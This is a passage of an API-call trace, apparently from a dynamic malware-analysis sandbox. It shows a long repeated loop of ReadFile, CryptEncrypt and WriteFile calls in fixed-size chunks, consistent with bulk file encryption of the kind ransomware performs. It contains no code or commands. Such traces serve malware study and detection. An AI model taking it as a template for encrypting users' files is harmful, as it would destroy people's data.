lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.749] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.749] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.750] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.750] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.750] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.750] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.750] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.750] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.750] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.750] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.750] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.750] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.750] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.750] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.751] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.751] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.751] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.751] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.751] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.751] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.751] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.751] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.751] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.751] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.751] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.751] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.752] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.752] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.752] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.752] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.752] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.752] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.752] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.752] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.752] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.752] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.752] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.752] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.752] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.753] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.753] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.753] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.753] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.753] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.753] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.753] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.753] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.753] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.753] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.753] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.753] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.753] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.753] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.754] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.754] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.754] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.754] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.754] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.754] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.754] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.754] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.754] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.754] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.754] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.754] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.754] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.755] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.755] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.755] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.755] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.755] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.755] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.755] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.755] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.755] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.755] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.755] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.755] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.755] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.755] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.756] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.756] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.756] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.756] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.756] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.756] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.756] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.756] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.756] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.756] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.756] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.756] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.756] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.756] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.756] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.757] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.757] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.757] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.757] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.757] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.757] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.757] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.757] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 